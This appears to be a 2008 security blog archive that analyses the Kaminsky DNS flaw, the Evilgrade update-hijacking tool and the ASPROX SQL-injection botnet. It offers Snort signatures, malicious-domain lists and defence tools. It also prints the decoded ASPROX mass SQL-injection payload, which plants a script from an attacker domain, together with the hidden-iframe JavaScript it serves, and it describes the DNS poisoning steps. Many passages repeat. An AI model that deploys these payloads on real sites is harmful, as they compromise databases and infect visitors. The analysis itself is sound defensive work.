On the tail of the huge DNS flaw, Argentinian group InfoByte Security Research have released a shocking new tool to exploit insecure application updates using man in the middle attack including Kaminsky's DNS poisoning.
Essentially "Evilgrade" is both an attack toolkit and mock update server framework to redirect application's update services to the host running Evilgrade. If successful full system compromise is capable giving the attacker a passive way to amass a botnet.
Evilgrade has support for exploiting the following popular program's update services:
Java, Winzip, Winamp, Mac OS X, OpenOffice, iTunes, Linkedin Toolbar
So what is the upside to such a scary tool? It will likely force developers to create new a new secure process for pushing updates, probably moving to some sort of PKI architecture.
Monday, July 28, 2008
Thursday, July 24, 2008
Kaminsky DNS Cache Poisoning PoC Exploit in Metasploit SVN
Looks like Druid and HDM have release a proof of concept exploit in Metasploit to attack nameserver's using Kaminsky's now leaked vulnerability. This is huge because not only is the attack unbelievably easy execute, 95% of the Internet is still vulnerable!
This is a historical moment in IT Security and will be a very, very busy day for those of us on the defense side.
Exploit Code:
http://www.caughq.org/exploits/CAU-EX-2008-0002.txt
http://www.caughq.org/exploits/CAU-EX-2008-0003.txt
Or simply grab the latest metasploit:
Snort signatures I wrote for Emerging Threats:
*** Update ***
New metasploit module out this morning which allows you to overwrite cache poisoning the NS record for an entire domain. This means if you have evil NS server to take requests you mass own entire domains such as google, microsoft, etc. Scary stuff.
http://blog.wired.com/27bstroke6/2008/07/dns-exploit-in.html
This is a historical moment in IT Security and will be a very, very busy day for those of us on the defense side.
Exploit Code:
http://www.caughq.org/exploits/CAU-EX-2008-0002.txt
http://www.caughq.org/exploits/CAU-EX-2008-0003.txt
Or simply grab the latest metasploit:
svn co http://metasploit.com/svn/framework3/trunk/
Snort signatures I wrote for Emerging Threats:
alert udp any 53 -> $HOME_NET any (msg:"ET CURRENT_EVENTS DNS Query Responses with 3 RR's set (50+ in 2 seconds) - possible NS RR Cache Poisoning Attempt"; content: "|85 00 00 01 00 01 00 01|"; offset: 2; within: 8; threshold: type both, track by_src,count 50, seconds 2; classtype:bad-unknown; reference:url,infosec20.blogspot.com/2008/07/kaminsky-dns-cache-poisoning-poc.html; sid:2008447; rev:10;)
alert udp any 53 -> $HOME_NET any (msg:"ET CURRENT_EVENTS DNS Query Responses with 3 RR's set (50+ in 2 seconds) - possible A RR Cache Poisoning Attempt"; content: "|81 80 00 01 00 01 00 01|"; offset: 2; within: 8; threshold: type both, track by_src, count 50, seconds 2; classtype:bad-unknown; reference:url,infosec20.blogspot.com/2008/07/kaminsky-dns-cache-poisoning-poc.html; sid:2008457; rev:10;)
*** Update ***
New metasploit module out this morning which allows you to overwrite cache poisoning the NS record for an entire domain. This means if you have evil NS server to take requests you mass own entire domains such as google, microsoft, etc. Scary stuff.
http://blog.wired.com/27bstroke6/2008/07/dns-exploit-in.html
Tuesday, July 22, 2008
Major DNS Flaw revealed
The Security blogosphere is exploding with chatter today about leaked details of Dan Kaminsky's multi-vendor DNS flaw.
Here is how it works (according to leak):
Malory wants to poison the server ns.polya.com
Malory sends NS requests for ulam00001.com, ulam00002.com … to ns.polya.com.
Malory then sends a forged answers, saying that the NS for http://www.ulam00002.com is ns.google.com *AND* puts a glue record saying that ns.google.com is 66.6.6.6
Because the glue records corresponds with the answer record, (same domain) the targetted nameserver will cache or replace it’s curent record of ns.google.com to be 66.6.6.6
http://addxorrol.blogspot.com/2008/07/on-dans-request-for-no-speculation.html
Make sure to read the comments for details of the original leak (Matasano's blog), the drama is Matasano originally called BS on the flaw forcing Dan to back it up with a phone briefing. Thomas Ptacek then re-tracked his BS claims under the agreement he would keep quiet. Now the same guy leaked the technical details is attempting to apologize... What a jerk.
http://www.matasano.com/log/1105/regarding-the-post-on-chargen-earlier-today/
Here is how it works (according to leak):
Malory wants to poison the server ns.polya.com
Malory sends NS requests for ulam00001.com, ulam00002.com … to ns.polya.com.
Malory then sends a forged answers, saying that the NS for http://www.ulam00002.com is ns.google.com *AND* puts a glue record saying that ns.google.com is 66.6.6.6
Because the glue records corresponds with the answer record, (same domain) the targetted nameserver will cache or replace it’s curent record of ns.google.com to be 66.6.6.6
http://addxorrol.blogspot.com/2008/07/on-dans-request-for-no-speculation.html
Make sure to read the comments for details of the original leak (Matasano's blog), the drama is Matasano originally called BS on the flaw forcing Dan to back it up with a phone briefing. Thomas Ptacek then re-tracked his BS claims under the agreement he would keep quiet. Now the same guy leaked the technical details is attempting to apologize... What a jerk.
http://www.matasano.com/log/1105/regarding-the-post-on-chargen-earlier-today/
Updated ASPROX Toolkit
We have a new tool kit available with the following important additions:
T-SQL code for cleaning infected databases.
URLScan configuration instructions for catching injection attempts.
click here to grab the new tool kit
T-SQL code for cleaning infected databases.
URLScan configuration instructions for catching injection attempts.
click here to grab the new tool kit
Thursday, July 10, 2008
ASPROX Botnet up to 16,500 Zombies
Just a quick update, ASPROX is currently around 16,500 zombies up from 12k last week.
Get the updated IP list of the infected zombie hosts
And make sure to grab our ASPROX information toolkit
Get the updated IP list of the infected zombie hosts
And make sure to grab our ASPROX information toolkit
Monday, July 7, 2008
ASPROX Payload Morphed NGG.JS
New domains found and new javascript payload "ngg.js" replaced the previous "b.js".
And it doesn't seem to be wasting any time:
http://www.google.com/search?q=ngg.js
Results 1 - 10 of about 19,300 for ngg.js. (0.03 seconds)
New SQL Injection Payload (HEX DECODED):
Whats in ngg.js? Familiar iframe attack from before but this time selectively ignores browsers from Russia, Ukraine, China, Korea, Vietnam and India. Lovely :)
New ASPROX domains spotted:
Snort signature to detect access of infected site:
And finally go here to download Sentinel IPS' ASPROX Information Toolkit
And it doesn't seem to be wasting any time:
http://www.google.com/search?q=ngg.js
Results 1 - 10 of about 19,300 for ngg.js. (0.03 seconds)
New SQL Injection Payload (HEX DECODED):
DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''script src=http://www.apidad.com/ngg.js /script''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
Whats in ngg.js? Familiar iframe attack from before but this time selectively ignores browsers from Russia, Ukraine, China, Korea, Vietnam and India. Lovely :)
window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("updngg=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+11*3600*1000);
document.cookie = "updngg=update;expires="+expires.toGMTString();
try{
document.write("iframe src=http://mainbvd.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0>/iframe");
}
catch(e)
{
};
}}
New ASPROX domains spotted:
apidad.com, mainbvd.com, bnrbtch.com, ucomddv.com, brsadd.com, asodbr.com, canclvr.com, portwbr.com, catdbw.mobi, allocbn.mobi, testwvr.com, stiwdd.com, adwadb.mobi, dbgbron.com, ktrcom.com, hiwowpp.cn, clrbbd.com, browsad.com, blockkd.com, bnradd.mobi, bnrbase.com, adbtch.com, aladbnr.com, aladbnr.com, loctenv.com, bnrbasead.com, appdad.com, blcadw.com, destbnp.com, attadd.com, nopcls.com, ausbnr.com, bkpadd.mobi, tctcow.com, ausadd.com, movaddw.com, cliprts.com
Snort signature to detect access of infected site:
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ASPROX Infected Site - ngg.js Request"; flow:established,to_server;
uricontent:"/ngg.js"; classtype:trojan-activity; reference:url,infosec20.blogspot.com/; rev:1; sid:4000002;)
And finally go here to download Sentinel IPS' ASPROX Information Toolkit
Thursday, July 3, 2008
ASPROX Botnet Fingerprinted: 11,816 Zombies
Today at 2pm CST I launched a massive query on our widespread network of Sentinel IPS appliances pulling unique source IP's from the ASPROX SQL Injection attacks.
Now we have an idea of size, location of zombies and a giant block list which we have made available right here
**Update** This is a list of infected machines emanating the SQL Injection attacks, not the number of compromised ASP websites, which is much higher nearing 100,000.
Was fun to whip up this geo-map of ASPROX's zombies...
Now we have an idea of size, location of zombies and a giant block list which we have made available right here
**Update** This is a list of infected machines emanating the SQL Injection attacks, not the number of compromised ASP websites, which is much higher nearing 100,000.
Was fun to whip up this geo-map of ASPROX's zombies...
Wednesday, July 2, 2008
New ASPROX / SQL Injection Defense Tools
ASPROX is not letting up, many of our clients are still seeing SQL Injection attacks blocked every 3-5 minutes on their Sentinel.
Microsoft released a tool for scanning your ASP and ASPX code and identifying SQL Injection vulnerabilities. I highly recommend giving it a try kb-954476
Also HP released a free version of their web security auditing tool specifically to check for SQL Injection, it's called Scrawler and you can get it here
More ASPROX domains (they don't give up, do they?):
tid62.com, kadport.com, suppadw.com, supbnr.com, adwsupp.com, bnrupdate.mobi, adwste.mobi, adupd.mobi, hlpgetw.com, hdadwcd.com, rid34.com, adupd.mobi, adwste.mobi, bnrupdate.mobi, cntrl62.com, config73.com, cont67.com, csl24.com, debug73.com, default37.com, get49.net, pid72.com, pid76.net, web923.com, base48.com, asp63.com, form43.com, maigol.cn
And finally we are still emailing our ASPROX Toolkit document which gives information on the attack and how to recover from it if you organization has been compromised.
Microsoft released a tool for scanning your ASP and ASPX code and identifying SQL Injection vulnerabilities. I highly recommend giving it a try kb-954476
Also HP released a free version of their web security auditing tool specifically to check for SQL Injection, it's called Scrawler and you can get it here
More ASPROX domains (they don't give up, do they?):
tid62.com, kadport.com, suppadw.com, supbnr.com, adwsupp.com, bnrupdate.mobi, adwste.mobi, adupd.mobi, hlpgetw.com, hdadwcd.com, rid34.com, adupd.mobi, adwste.mobi, bnrupdate.mobi, cntrl62.com, config73.com, cont67.com, csl24.com, debug73.com, default37.com, get49.net, pid72.com, pid76.net, web923.com, base48.com, asp63.com, form43.com, maigol.cn
And finally we are still emailing our ASPROX Toolkit document which gives information on the attack and how to recover from it if you organization has been compromised.
Tuesday, July 1, 2008
Iframes and IE, vewwy vewwy bad...
Response poured in from my last post wanting to know how Malware can be loaded from simply including an iframe (sourcing html from another site).
Well in case you too are wondering, MS never intended it to be that way....
See http://www.kb.cert.org/vuls/id/516627
New ASPROX domains: dl251.com
Well in case you too are wondering, MS never intended it to be that way....
See http://www.kb.cert.org/vuls/id/516627
New ASPROX domains: dl251.com
Subscribe to:
Posts (Atom)